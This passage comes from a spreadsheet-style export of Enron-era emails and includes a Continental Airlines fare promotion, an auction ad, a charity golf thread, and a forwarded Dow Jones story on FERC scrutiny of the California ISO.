3. Westin Hotels &amp; Resorts, Sheraton Hotels &amp; Resorts, Four Points by Sheraton, St. Regis, The Luxury Collection and W Hotels Offers_x000D_
4. Alamo Rent A Car Offers_x000D_
5. National Car Rental Offers_x000D_
_x000D_
****************************************_x000D_
1. THIS WEEK'S DESTINATIONS_x000D_
_x000D_
Depart Saturday, January 5 and return on either Monday, January 7 or Tuesday, January 8, 2002. Please see the Terms and Conditions listed at the end of this e-mail._x000D_
_x000D_
For OnePass members, here are special opportunities to redeem miles for travel to the following destinations. As an additional benefit, OnePass Elite members can travel using the miles below as the only payment necessary. The following are this week's OnePass continental.com Specials._x000D_
_x000D_
To use your OnePass miles (as listed below) to purchase continental.com Specials, you must call 1-800-642-1617._x000D_
_x000D_
THERE WILL NOT BE AN ADDITIONAL $20 CHARGE WHEN REDEEMING ONEPASS MILES FOR CONTINENTAL.COM SPECIALS THROUGH THE TOLL FREE RESERVATIONS NUMBER._x000D_
_x000D_
If you are not using your OnePass miles, purchase continental.com Specials online until 11:59pm (CST) Friday at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*ZA_x000D_
You can also purchase continental.com Specials for an additional cost of $20 per ticket through our telephone service at 1-800-642-1617._x000D_
_x000D_
**********************************************_x000D_
ROUND-TRIP TRAVEL MAY ORIGINATE IN EITHER CITY_x000D_
**********************************************_x000D_
****Roundtrip BETWEEN CLEVELAND, OH and:_x000D_
_x000D_
$29 + 12,500 Miles or $119 - Milwaukee, WI_x000D_
_x000D_
****Roundtrip BETWEEN HOUSTON, TX and:_x000D_
_x000D_
$29 + 10,000 Miles or $109 - Alexandria, LA_x000D_
$29 + 12,500 Miles or $119 - Amarillo, TX_x000D_
$29 + 10,000 Miles or $109 - Beaumont/Pt. Arthur, TX_x000D_
$29 + 10,000 Miles or $109 - Gulfport/Biloxi, MS_x000D_
$29 + 12,500 Miles or $119 - Tulsa, OK_x000D_
_x000D_
****Roundtrip BETWEEN NEW YORK/NEWARK and:_x000D_
_x000D_
$29 + 12,500 Miles or $119 - Albany, NY_x000D_
$29 + 12,500 Miles or $119 - Greensboro/Piedmont Triad, NC_x000D_
$29 + 15,000 Miles or $159 - Kansas City, MO_x000D_
$29 + 12,500 Miles or $129 - Nashville, TN_x000D_
$29 + 15,000 Miles or $159 - New Orleans, LA_x000D_
$29 + 10,000 Miles or $109 - Norfolk, VA_x000D_
$29 + 10,000 Miles or $109 - Portland, ME_x000D_
$29 + 10,000 Miles or $109 - Richmond, VA_x000D_
$29 + 10,000 Miles or $109 - Syracuse, NY_x000D_
_x000D_
_x000D_
********************************_x000D_
2. CONTINENTAL.COM SPECIALS FROM HILTON HOTELS AND RESORTS, DOUBLETREE_x000D_
HOTELS AND RESORTS, AND EMBASSY SUITES HOTELS_x000D_
_x000D_
The following rates are available January 5 - January 7, 2002 and are priced per night._x000D_
--------------------------------------_x000D_
Cleveland, OH - Hilton Garden Inn, Cleveland Airport - $79_x000D_
_x000D_
Houston, TX - Embassy Suites Hotel Houston, Near The Galleria - $130_x000D_
Houston, TX - Hilton Houston Hobby Airport - $88_x000D_
Houston, TX - Hilton Houston Westchase and Towers - $149_x000D_
_x000D_
Nashville, TN - Hilton Suites Nashville, Downtown - $109_x000D_
_x000D_
Newark, NJ - Doubletree Club Suites Jersey City, Jersey City  NJ - $149 (January 5-6 only)_x000D_
Newark, NJ - Hilton Pearl River, Pearl River  NY - $125_x000D_
_x000D_
_x000D_
To book this week's special rates for Hilton Family Hotels, visit and book at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*AA_x000D_
Special rates apply only for the dates listed at each hotel and are subject to availability. Check hilton.com for specific dates at each Hilton Family Hotel. Or call at 1-800-774-1500 and ask for Value Rates. Restrictions apply to these rates._x000D_
_x000D_
****************************************_x000D_
3. CONTINENTAL.COM SPECIALS LAST-MINUTE WEEKEND RATES FROM WESTIN HOTELS &amp; RESORTS, SHERATON HOTELS &amp; RESORTS, FOUR POINTS BY SHERATON, ST. REGIS, THE LUXURY COLLECTION, AND W HOTELS_x000D_
_x000D_
There are no offerings from Westin Hotels &amp; Resorts, Sheraton Hotels &amp; Resorts, Four Points by Sheraton, St. Regis, The Luxury Collection and W Hotels this week._x000D_
_x000D_
_x000D_
********************************_x000D_
4. CONTINENTAL.COM SPECIALS FROM ALAMO RENT A CAR_x000D_
_x000D_
Rates listed below are valid on compact class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, January 5 with returns Monday, January 7 or Tuesday, January 8, 2002._x000D_
-------------------------------_x000D_
$17 a day in: Milwaukee, WI (MKE)_x000D_
$18 a day in: Greensboro/Piedmont Triad, NC (GSO)_x000D_
$18 a day in: Houston, TX (IAH)_x000D_
$18 a day in: Kansas City, MO (MCI)_x000D_
$18 a day in: Nashville, TN (BNA)_x000D_
$18 a day in: Tulsa, OK (TUL)_x000D_
$20 a day in: Cleveland, OH (CLE)_x000D_
$26 a day in: New Orleans, LA (MSY)_x000D_
$26 a day in: Newark, NJ (EWR)_x000D_
_x000D_
To receive continental.com Specials discounted rates, simply make advance reservations and be sure to request ID # 596871 and Rate Code 33. Book your reservation online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*BA_x000D_
or contact Alamo at 1-800 GO ALAMO._x000D_
_x000D_
*If you are traveling to a city or a different date that is not listed, Alamo offers great rates when you book online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*CA_x000D_
For complete details on these offers, please refer to Alamo's terms and conditions below._x000D_
_x000D_
****************************************_x000D_
5. CONTINENTAL.COM SPECIALS FROM NATIONAL CAR RENTAL_x000D_
_x000D_
Rates listed below are valid on intermediate class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, January 5 with returns Monday, January 7 or Tuesday, January 8, 2002._x000D_
------------------------------------------_x000D_
$21 a day in: Amarillo, TX (AMA)_x000D_
$21 a day in: Greensboro/Piedmont Triad, NC (GSO)_x000D_
$21 a day in: Gulfport/Biloxi, MS (GPT)_x000D_
$21 a day in: Houston, TX (IAH)_x000D_
$21 a day in: Kansas City, MO (MCI)_x000D_
$21 a day in: Nashville, TN (BNA)_x000D_
$21 a day in: Syracuse, NY (SYR)_x000D_
$21 a day in: Tulsa, OK (TUL)_x000D_
$23 a day in: Cleveland, OH (CLE)_x000D_
$28 a day in: Alexandria, LA (AEX)_x000D_
$28 a day in: Norfolk, VA (ORF)_x000D_
$28 a day in: Richmond, VA (RIC)_x000D_
$29 a day in: New Orleans, LA (MSY)_x000D_
$29 a day in: Newark, NJ (EWR)_x000D_
_x000D_
To receive continental.com Specials discounted rates, simply make your reservations in advance and be sure to request Product Code COOLUS. To make your reservation, contact National at 1-800-CAR-RENT (1-800-227-7368), or book your reservation online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*DA_x000D_
Please enter COOLUS in the Product Rate Code field, and 5037126 in the Contract ID field to ensure you get these rates on these dates._x000D_
_x000D_
* If you are traveling to a city or a different date that is not listed, National offers great rates when you book online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*VUA_x000D_
For complete details on these offers, please refer to National's terms and conditions below._x000D_
_x000D_
****************************************_x000D_
CONTINENTAL.COM SPECIALS RULES:_x000D_
Fares include a $37.20 fuel surcharge.  Passenger Facility Charges, up to $18 depending on routing, are not included. Up to $2.75 per segment federal excise tax, as applicable, is not included.  Applicable International and or Canadian taxes and fees up to $108, varying by destination, are not included and may vary slightly depending on currency exchange rate at the time of purchase. For a complete listing of rules please visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*VVA_x000D_
_x000D_
_x000D_
ALAMO RENT A CAR'S TERMS AND CONDITIONS:_x000D_
Taxes (including VLF taxes up to US$1.89 per day in California and GST), other governmentally-authorized or imposed surcharges, license recoupment fees, fuel, additional driver fee, drop charges and optional items (such as CDW Waiver Savers(R) up to US$18.99 a day,) are extra. Renter must meet standard age, driver and credit requirements. Rates higher for drivers under age 25. Concession recoupment fees may add up to 14% to the rental rate at some on-airport locations. Up to 10.75% may be added to the rental rate if you rent at an off-airport location and exit on our shuttle bus. Weekly rates require a 5-day minimum rental or daily rates apply. For weekend rates, the vehicle must be picked up after 9 a.m. on Thursday and returned before midnight on Monday or higher daily rates apply. 24-hour advance reservation required. May not be combined with other discounts. Availability is limited. All vehicles must be returned to the country of origin. Offer not valid in San Jose, CA._x000D_
_x000D_
NATIONAL CAR RENTAL TERMS AND CONDITIONS:_x000D_
Customer must provide Contract ID# at the time of reservation to be eligible for discounts. Offer valid at participating National locations in the US and Canada. Minimum rental age is 25. This offer is not valid with any other special discount or promotion. Standard rental qualifications apply. Subject to availability and blackout dates. Advance reservations required. Geographic driving restrictions may apply._x000D_
_x000D_
TERMS AND CONDITIONS FOR WESTIN, SHERATON, FOUR POINTS,_x000D_
ST. REGIS, THE LUXURY COLLECTION, AND W HOTELS:_x000D_
Offer is subject to availability. Advance Reservations required and is based on single/double occupancy. Offer not applicable to group travel. Additional Service charge and tax may apply. The discount is reflected in the rate quoted. Offer valid at participating hotel only. Offer valid for stays on Fri - Mon with a Friday or Saturday night arrival required. Rate available for this coming weekend only. Offer available only by making reservations via the internet. A limited number of rooms may be available at these rates._x000D_
_x000D_
---------------------------------------_x000D_
This e-mail message and its contents are copyrighted and are proprietary products of Continental Airlines, Inc. Any unauthorized use, reproduction, or transfer of the message or its content, in any medium, is strictly prohibited._x000D_
_x000D_
****************************************_x000D_
If you need assistance please visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*VWA_x000D_
View our privacy policy at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*VXA_x000D_
_x000D_
This e-mail was sent to: jtholt@enron.com_x000D_
You registered with OnePass Number: sc266224_x000D_
_x000D_
TO UNSUBSCRIBE:_x000D_
We hope you will find continental.com Specials a valuable source of information. However, if you prefer not to take advantage of this opportunity, please let us know by visiting the continental.com Specials page on our web site at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*VZA_x000D_
_x000D_
TO SUBSCRIBE:_x000D_
Please visit the continental.com Specials page on our web site at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAZ*qmohsmQLgkhgEJht*z*VYA_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 13:17:39 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: PGE Transmission Annuity</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Robinson, Donald  _x000D_
Sent:	Tuesday, February 05, 2002 9:28 AM_x000D_
To:	Scholtes, Diana_x000D_
Subject:	FW: PGE Transmission Annuity_x000D_
_x000D_
_x000D_
Here you go._x000D_
_x000D_
Thanks._x000D_
 -----Original Message-----_x000D_
From: 	Thome, Stephen  _x000D_
Sent:	Tuesday, February 05, 2002 9:09 AM_x000D_
To:	Robinson, Donald; Lew, Elsie; Elafandi, Mo_x000D_
Cc:	Sewell, Doug_x000D_
Subject:	PGE Transmission Annuity_x000D_
_x000D_
Don,_x000D_
_x000D_
Can you please modify the PGE Transmission Annuity in Enpower to reflect the following:_x000D_
_x000D_
It is current set at $152,668.80.  Our payment due to PGE is $101,304.00.  _x000D_
_x000D_
According to Elsie, we need to log a Sale Annuity for $51,364.80_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Steve Thome_x000D_
x3806</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 01:59:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'exclusive_ofers@sportsline.com'})</t>
  </si>
  <si>
    <t>Win a Vegas Vacation MEGA Auction and Get $500 in Chips!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 =09_x000D_
_x000D_
_x000D_
[IMAGE]=09_x000D_
_x000D_
_x000D_
 =09                  =09 =09_x000D_
_x000D_
_x000D_
 =09 =09Get the Best of the Las Vegas Strip for Pennies on the Dollar!   10=_x000D_
0 Vegas Vacations up for auction with bids starting at $1. Get in on this u=_x000D_
ltimate gamblers package today. Spend 4 Days in Vegas at Your Choice of one=_x000D_
 of the following resorts: Bally's Resort &amp; Casino, Flamingo Resort &amp; Casin=_x000D_
o, Stardust Hotel &amp; Casino, Riviera Hotel &amp; Casino.    Here's the best part=_x000D_
: Get your bid in early and win a free upgrade to the Aladdin Resort &amp; Casi=_x000D_
no + $500 in chips!   Click here  to learn more.     Say Goodbye to your tr=_x000D_
avel agent forever:    With over 1,000,000 products up for auction daily, t=_x000D_
op-level customer support, bids starting at $9, manufacturer warranties on =_x000D_
the name brands you know and trust, uBid is the Online Auction buyers Super=_x000D_
site of choice.   Check out some other recent WINNING travel auctions...   =_x000D_
      3 Days in St. Maarten for $69,        American Tourister Carry-On Lug=_x000D_
gage Set for $99        Carnival 7-Night Triumph Cruise for $499.   Sign-up=_x000D_
 and Bid Today    HOT DEALS THIS WEEK   Celebrity Cruises 7 Nt Western Cari=_x000D_
bbean Cruise  -- Starting at $9 Targus, Samsonite and American Tourister Lu=_x000D_
ggage  -- Starting at $9 Orlando/Disney 3,4 and 7 Vacations  -- Starting at=_x000D_
 $9     About uBid:    Trust, as they say, is earned.    Since 1997 uBid ha=_x000D_
s been the number one Auction site for major brand name products from leadi=_x000D_
ng manufacturers like Compaq, Dell, Hewlett Packard, JVC and Sony. If you h=_x000D_
ave a problem or question, our customer service team is available via email=_x000D_
 around-the-clock, 24 hours a day, 7 days a week. The majority of items are=_x000D_
 inventoried and shipped from uBid's own warehouse. uBid carries the BBB On=_x000D_
line seal, and is also an AOL Certified Merchant. So, start  shopping at uB=_x000D_
id.com and never pay retail again!   Note: Some auctions listed may have cl=_x000D_
osed as inventory levels change daily    You received this e-mail because y=_x000D_
ou registered on CBS SportsLine.com. If you do not want to receive these sp=_x000D_
ecial e-mail offers you can unsubscribe by clicking this link: http://www.s=_x000D_
portsline.com/u/newsletters/newsletter.cgi?email=3Dbmckay@enron.com or by r=_x000D_
eplying to this message with "unsubscribe" in the subject line. You are sub=_x000D_
scribed as bmckay@enron.com.  Although we are sending this e-mail to you, S=_x000D_
portsLine.com is not responsible for the advertisers' content and makes no =_x000D_
warranties or guarantees about the products or services advertised. SportsL=_x000D_
ine.com takes your privacy  seriously. To learn more about SportsLine.com's=_x000D_
 use of personal information, please read our Privacy Statement. =09 =09 =_x000D_
=09_x000D_
_x000D_
_x000D_
[IMAGE]=09_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 06:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Golf for Sarah</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for your support.  We checked into the matching, but unfortunately _x000D_
since the group raising this money was not formed as a Charitable _x000D_
Organization under the tax reg's, the ability to get Enron to match is not _x000D_
availible.  The goal of each golfer is to raise at least $1000 towards the _x000D_
$150K goal, and your donation puts me over the $1K bar._x000D_
_x000D_
Thanks again._x000D_
_x000D_
Fred_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Friday, June 01, 2001 1:37 PM_x000D_
To: Mitro, Fred_x000D_
Subject: Re: Golf for Sarah_x000D_
_x000D_
I can't open the form, but I'm good for $50.  Is this something Enron can _x000D_
match?_x000D_
_x000D_
_x000D_
_x000D_
From: Fred Mitro/ENRON@enronXgate on 06/01/2001 01:34 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Golf for Sarah_x000D_
_x000D_
_x000D_
Kay: _x000D_
_x000D_
Here is the information on the charity golf outing we discussed.  Check out _x000D_
sarahssoldiers.com for more information on Sarah and the efforts to help _x000D_
her.  _x000D_
_x000D_
Attached at the bottom of this email is a pledge form.  _x000D_
_x000D_
Thanks for your support in this good cause._x000D_
_x000D_
Fred_x000D_
_x000D_
---------------------- Forwarded by Fred Mitro/HOU/ECT on 04/12/2001 03:54 PM _x000D_
---------------------------_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
Stephen Morse@ENRON COMMUNICATIONS on 04/12/2001 03:00:16 PM_x000D_
To: _x000D_
_x000D_
Enron Golfers:_x000D_
_x000D_
Hey guys, Sarah Edwards is a friend of a friend's daughter who desperately _x000D_
needs help to stay alive and all you duffers out there can help:_x000D_
_x000D_
The 100 holes for golf for Sarah Edwards will be Monday June 4 at_x000D_
Sweetwater CC. Sarah needs a lung transplant and_x000D_
approximately $150,000 of the costs are not covered by insurance or_x000D_
medicaid.  _x000D_
_x000D_
For more info on Sarah, visit Sarahssoldiers.com _x000D_
_x000D_
Here is how the 100 holes for golf works:_x000D_
_x000D_
*Free golf at Sweetwater_x000D_
*You play as many holes as you can (100 is not mandatory)_x000D_
* We provide your lunch, drinks and snacks_x000D_
* You get pledges from your friends to play_x000D_
*pledges may be flat amounts, per hole, per birdie or per eagle_x000D_
_x000D_
Lets all keep Sarah alive! Can I get some other tentative commitments?_x000D_
_x000D_
thanks!_x000D_
_x000D_
Steve_x000D_
_x000D_
Steve Morse_x000D_
Enron Broadband Services_x000D_
713-853-7137-work_x000D_
713-569-7912-cell_x000D_
email:  stephen_morse@enron.net_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
_x000D_
_x000D_
 - pledge.doc &lt;&lt; File: pledge.doc &gt;&gt; _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 09:46:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FERC To Examine Alleged Market Manipulation By Calif ISO.  FERC_x000D_
 Meeting in California on Monday.  CSFB on PCG Proposal.</t>
  </si>
  <si>
    <t>Not a problem.  Will call in about 30 minutes._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Delaney Hunter [mailto:dhunter@s-k-w.com]=20_x000D_
Sent:=09Tuesday, September 25, 2001 11:46 AM_x000D_
To:=09Dasovich, Jeff_x000D_
Subject:=09RE: FERC To Examine Alleged Market Manipulation By Calif ISO.  F=_x000D_
ERC Meeting in California on Monday.  CSFB on PCG Proposal._x000D_
_x000D_
Jeff-_x000D_
Hey got your voicemail this morning - sorry about that. What's up? I am in =_x000D_
the office- give me a jingle._x000D_
_x000D_
Delaney_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Dasovich, Jeff [mailto:Jeff.Dasovich@ENRON.com]=20_x000D_
Sent:=09Tuesday, September 25, 2001 9:05 AM_x000D_
To:=09Dasovich, Jeff; Delaney Hunter ; 'Lenny Goldberg' ; 'Jack M. Stewart'=_x000D_
 ; 'John R. Redding (PS, NE) (E-mail)' ; 'Evelyn Kahl' ; 'Keith McCrea' ; '=_x000D_
Mike Kahl' ; 'Jeff Dasovich (E-mail)' ; 'Bill Booth' ; 'Dorothy Rothrock' ;=_x000D_
 'Ann Cohn' ; 'Jan Smutny-Jones' ; 'John Fielder (E-mail)' ; 'Barbara Barko=_x000D_
vich' ; 'Dominic DiMare' ; 'Karen Terranova' ; 'Marc D. Joseph' ; 'Art Cart=_x000D_
er' ; 'Bill Dombrowski' ; 'Derek Naten' ; 'John White' ; 'Robert Albergotti=_x000D_
 (E-mail)' ; 'Diana Liebman (E-mail)' ; 'Linda Sherif (E-mail)' ; Mike Flor=_x000D_
io (E-mail) ; Phil Isenberg (E-mail) ; Tom McMorrow (E-mail)=20_x000D_
Subject:=09RE: FERC To Examine Alleged Market Manipulation By Calif ISO.  F=_x000D_
ERC Meeting in California on Monday.  CSFB on PCG Proposal._x000D_
_x000D_
I've been informed that the CSFB report on PG&amp;E's reorg didn't make it firs=_x000D_
t time round.  Trying again. =20_x000D_
Best,_x000D_
Jeff_x000D_
 &lt;&lt; File: 092101PCG.pdf &gt;&gt;=20_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Dasovich, Jeff =20_x000D_
Sent:=09Friday, September 21, 2001 7:23 PM_x000D_
To:=09'Delaney Hunter '; ''Lenny Goldberg' '; ''Jack M. Stewart' '; ''John =_x000D_
R. Redding (PS, NE) (E-mail)' '; ''Evelyn Kahl' '; ''Keith McCrea' '; ''Mik=_x000D_
e Kahl' '; ''Jeff Dasovich (E-mail)' '; ''Bill Booth' '; ''Dorothy Rothrock=_x000D_
' '; ''Ann Cohn' '; ''Jan Smutny-Jones' '; ''John Fielder (E-mail)' '; ''Ba=_x000D_
rbara Barkovich' '; ''Dominic DiMare' '; ''Karen Terranova' '; ''Marc D. Jo=_x000D_
seph' '; ''Art Carter' '; ''Bill Dombrowski' '; ''Derek Naten' '; ''John Wh=_x000D_
ite' '; ''Robert Albergotti (E-mail)' '; ''Diana Liebman (E-mail)' '; ''Lin=_x000D_
da Sherif (E-mail)' '; 'Mike Florio (E-mail) '; 'Phil Isenberg (E-mail) '; =_x000D_
'Tom McMorrow (E-mail) '_x000D_
Subject:=09FERC To Examine Alleged Market Manipulation By Calif ISO.  FERC =_x000D_
Meeting in California on Monday.  CSFB on PCG Proposal._x000D_
_x000D_
FYI. =20_x000D_
Thought folks might be interested in the following story. =20_x000D_
In addition, I've attached at the end for those that are interested a CSFB =_x000D_
report on PG&amp;E's POR announced yesterday._x000D_
Very much enjoyed working with this group on a solution for California.  Pe=_x000D_
rhaps, given were things stand, we'll have another shot at helping get the =_x000D_
market, California energy policy, and Edison, back on their feet._x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
FERC To Examine Alleged Market Manipulation By Calif ISO=20_x000D_
Updated: Friday, September 21, 2001 04:53 PM ET By Jason Leopold Of DOW JON=_x000D_
ES NEWSWIRES=20_x000D_
LOS ANGELES (Dow Jones)--Federal energy regulators may investigate whether =_x000D_
the operator of California's wholesale electricity market has been manipula=_x000D_
ting its power-purchasing practices to reduce the costs of power the state =_x000D_
purchased under long-term contracts, according to documents obtained Friday=_x000D_
 by Dow Jones Newswires Friday.=20_x000D_
At issue is whether the California Independent System Operator has violated=_x000D_
 its own market rules by purchasing expensive power secured by the state un=_x000D_
der contracts rather than cheaper power available in the spot market. The s=_x000D_
tate's need to sell off surplus power secured under those contracts has pro=_x000D_
ven embarrassing for Gov. Gray Davis, who signed $43 billion in deals to he=_x000D_
ad off a summer of spiking prices and blackouts that never materialized.=20_x000D_
The Federal Energy Regulatory Commission will hold a meeting in California =_x000D_
Monday to address generators' complaints. The energy companies say that the=_x000D_
 California ISO's purchasing decisions are difficult to comprehend and out =_x000D_
of line with the market, according to a letter sent by Andrea Wolfman, lead=_x000D_
 FERC counsel for market oversight and enforcement.=20_x000D_
The letter was sent to the ISO, the California Department of Water Resource=_x000D_
s - which has been buying power in lieu of the state's struggling utilities=_x000D_
 since mid-January - and several generators, all of which were to attend th=_x000D_
e meeting.=20_x000D_
"Recently we have become concerned that the scheduling and dispatch procedu=_x000D_
res of the California ISO, as they have had to change in the last nine mont=_x000D_
hs, are not well understood or are not well suited to the current market st=_x000D_
ructure," Wolfman said in her letter. "The purpose of the meeting is to dev=_x000D_
elop agreement between the ISO and those that participate in the scheduling=_x000D_
 and dispatch (generators, utilities, CDWR) on appropriate practices and pr=_x000D_
ocedures."=20_x000D_
ISO Procedures Need Explaining -FERC=20_x000D_
The ISO's main responsibility is keeping power supply and demand in balance=_x000D_
 on the state's electrical grid. As part of that job, the ISO determines wh=_x000D_
ich power plants to call into service and which suppliers to buy power from=_x000D_
.=20_x000D_
If the ISO can't explain how it makes its decisions, FERC may conduct an au=_x000D_
dit of the organization and investigate the possibility it has manipulated =_x000D_
the market, Wolfman's office said.=20_x000D_
"As discussed, FERC may schedule a technical conference and operational aud=_x000D_
it of CAISO," a second letter from FERC's market oversight and enforcement =_x000D_
division states. "This unprecedented examination of CAISO operations could =_x000D_
lead to the belief that complaints by generators of market manipulation and=_x000D_
 other practices by the ISO should be investigated."=20_x000D_
The ISO's operating rules generally call for it to purchase the cheapest po=_x000D_
wer first.=20_x000D_
"The information that (generators) have provided all leads to a theory that=_x000D_
 the CAISO is manipulating the market in order to purchase surplus DWR powe=_x000D_
r at high prices and protect Gov. Davis from political embarrassment," the =_x000D_
second letter says.=20_x000D_
The ISO has said only that the market isn't operating as intended, and decl=_x000D_
ined to answer other questions about the allegations or discuss Monday's me=_x000D_
eting.=20_x000D_
Generators Confused=20_x000D_
Generators, including Mirant Corp. (MIR &lt;http://quicken.excite.com/investme=_x000D_
nts/quotes/?symbol=3DMIR&gt;, news &lt;http://quicken.excite.com/investments/news=_x000D_
/?symbol=3DMIR&gt;, msgs &lt;http://quicken.excite.com/investments/discuss/?symbo=_x000D_
l=3DMIR&gt;), Reliant Energy Inc. (REI &lt;http://quicken.excite.com/investments/=_x000D_
quotes/?symbol=3DREI&gt;, news &lt;http://quicken.excite.com/investments/news/?sy=_x000D_
mbol=3DREI&gt;, msgs &lt;http://quicken.excite.com/investments/discuss/?symbol=3D=_x000D_
REI&gt;), Williams Cos. (WMB &lt;http://quicken.excite.com/investments/quotes/?sy=_x000D_
mbol=3DWMB&gt;, news &lt;http://quicken.excite.com/investments/news/?symbol=3DWMB=_x000D_
&gt;, msgs &lt;http://quicken.excite.com/investments/discuss/?symbol=3DWMB&gt;), Duk=_x000D_
e Energy (DUK &lt;http://quicken.excite.com/investments/quotes/?symbol=3DDUK&gt;,=_x000D_
 news &lt;http://quicken.excite.com/investments/news/?symbol=3DDUK&gt;, msgs &lt;htt=_x000D_
p://quicken.excite.com/investments/discuss/?symbol=3DDUK&gt;) and Dynegy Inc. =_x000D_
(DYN &lt;http://quicken.excite.com/investments/quotes/?symbol=3DDYN&gt;, news &lt;ht=_x000D_
tp://quicken.excite.com/investments/news/?symbol=3DDYN&gt;, msgs &lt;http://quick=_x000D_
en.excite.com/investments/discuss/?symbol=3DDYN&gt;), have bought apparently i=_x000D_
nexpensive power in the ISO's spot market only to find weeks later that the=_x000D_
 price was much higher. That's because, according to the allegations, the I=_x000D_
SO is letting DWR supply expensive power into the market as "out-of-market"=_x000D_
 purchases that aren't averaged into the real-time prices that ISO market p=_x000D_
articipants see.=20_x000D_
DWR continues to buy out-of-market power regularly at the ISO's request, DW=_x000D_
R operations chief Pete Garris has said, but those purchases are being made=_x000D_
 in the spot market and are never being satisfied by power from DWR's long-=_x000D_
term contracts.=20_x000D_
The out-of-market purchases appear to be expensive, however. According to t=_x000D_
he ISO's August market report, the average out-of-market price for peak hou=_x000D_
rs was $55.90 a megawatt-hour, compared with $26.49/MWh on the ISO computer=_x000D_
ized market. Brokered prices of western electricity have been lower than th=_x000D_
e out-of-market prices for months.=20_x000D_
None of the companies mentioned was willing to comment on the record.=20_x000D_
The meeting is scheduled to be held at the ISO's headquarters in Folsom, Ca=_x000D_
lif., and representatives from power producers, utilities and the state are=_x000D_
 expected to attend. FERC will serve as facilitator, Wolfman said. The meet=_x000D_
ing isn't open to the public.=20_x000D_
The meeting will begin with a presentation by the ISO on its practices and =_x000D_
operational procedures, followed by adjustments that may be needed to impro=_x000D_
ve the market.=20_x000D_
"The objective is to develop a written set of procedures that is agreed to =_x000D_
by all the market participants and that is consistent with good utility pra=_x000D_
ctices," Wolfman said in the letter.=20_x000D_
-By Jason Leopold, Dow Jones Newswires; 323-658-3874; jason.leopold@dowjone=_x000D_
s.com &lt;mailto:jason.leopold@dowjones.com&gt;=20_x000D_
   &lt;&lt; File: 092101PCG.pdf &gt;&gt; =20_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate an=_x000D_
d may contain confidential and privileged material for the sole use of the =_x000D_
intended recipient (s). Any review, use, distribution or disclosure by othe=_x000D_
rs is strictly prohibited. If you are not the intended recipient (or author=_x000D_
ized to receive for the recipient), please contact the sender or reply to E=_x000D_
nron Corp. at enron.messaging.administration@enron.com and delete all copie=_x000D_
s of the message. This e-mail (and any attachments hereto) are not intended=_x000D_
 to be an offer (or an acceptance) and do not create or evidence a binding =_x000D_
and enforceable contract between Enron Corp. (or any of its affiliates) and=_x000D_
 the intended recipient or any other party, and may not be relied on by any=_x000D_
one as the basis of a contract by estoppel or otherwise. Thank you.=20_x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 07:17:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'andy.zipper@enron.com', 'jay.fitzgerald@enron.com', 'drew.ries@enron.com'})</t>
  </si>
  <si>
    <t>Kiodex</t>
  </si>
  <si>
    <t xml:space="preserve">Travis McCullough_x000D_
Enron North America Corp._x000D_
1400 Smith Street EB 3893_x000D_
Houston Texas 77002_x000D_
Phone:  (713) 853-1575_x000D_
Fax: (713) 646-3490      _x000D_
----- Forwarded by Travis McCullough/HOU/ECT on 03/15/2001 09:16 AM -----_x000D_
_x000D_
_x000D_
	"Stockbridge, Edward T" &lt;tstockbridge@velaw.com&gt; 03/14/2001 11:11 PM 	   To: "McCullough, Travis (Enron)" &lt;travis.mccullough@enron.com&gt;  cc: "Telle, Michael S." &lt;mtelle@velaw.com&gt;, "Breeland, Pat" &lt;pbreeland@velaw.com&gt;  Subject: Kiodex	_x000D_
